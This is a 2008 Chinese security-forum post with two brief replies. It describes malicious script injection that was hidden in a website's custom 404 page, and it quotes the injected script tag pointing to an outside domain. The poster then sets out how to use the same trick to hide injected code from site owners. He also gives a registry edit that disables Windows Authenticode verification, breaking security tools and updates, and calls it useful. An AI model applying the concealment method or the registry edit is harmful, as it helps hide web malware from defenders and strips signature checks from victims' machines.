飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 1848|回复: 2

404挂马 + 杂谈 + AD

[复制链接]
  • TA的每日心情
    开心
    2024-6-9 16:20
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2008-3-25 11:14:14 | 显示全部楼层 |阅读模式
    今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

         细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:

    <script src="http://ad.XXX.com/file/da.js"></script>



         貌似最近第三次看到了;

         P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

        细想一下,这样是一个不错的挂马选择:

        先把挂马代码插入到要返回的404信息里面;

        然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;

    只要URL的名称不是太难看,足以让一些站长昏头转向,找不着马来,对于我等找马的人来说也是挺麻烦的。

    DI+#KE#=XD+I+K=E#XD+IK+$E=X+DIK##EXD$#IK#=E#$X=DI+K=EX#+D#IK$=EX++DIK$+E#+X+D=#I#K#$E=XD$=I$+K$$E=XD+$I=$K+

        杂谈时间:

       无意中发现了一样东西:

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer]
    "AuthenticodeFlags"=dword:00000101


        导入上面的注册表信息后,你将会发现Windows的文件校验失效,导致autoruns等调用微软的校验的软件全部失效,显示所有的文件都没有通过微软认证(SRENG等第三方的无碍);

        还有QQ医生无法运行,证书也会出现问题,自动更新无法进行……

        哈哈,还是挺好用的一个东西

    +D$IKE#XDIKEXD$I#K$E#$X=D+#I#$K+E=X=#D#I++K+=EX##DI+=K=E$$XD$IK#+EX+DI$=KE#XDIK+EX=D=#IK++EXD$#IKEX=D
    PYG19周年生日快乐!
  • TA的每日心情
    慵懒
    2018-2-11 09:23
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    发表于 2008-3-26 08:41:49 | 显示全部楼层
    很毒,很强大/:L
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2008-4-4 14:58:54 | 显示全部楼层
    谢谢楼主.高人啊!高人啊!顶一下
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表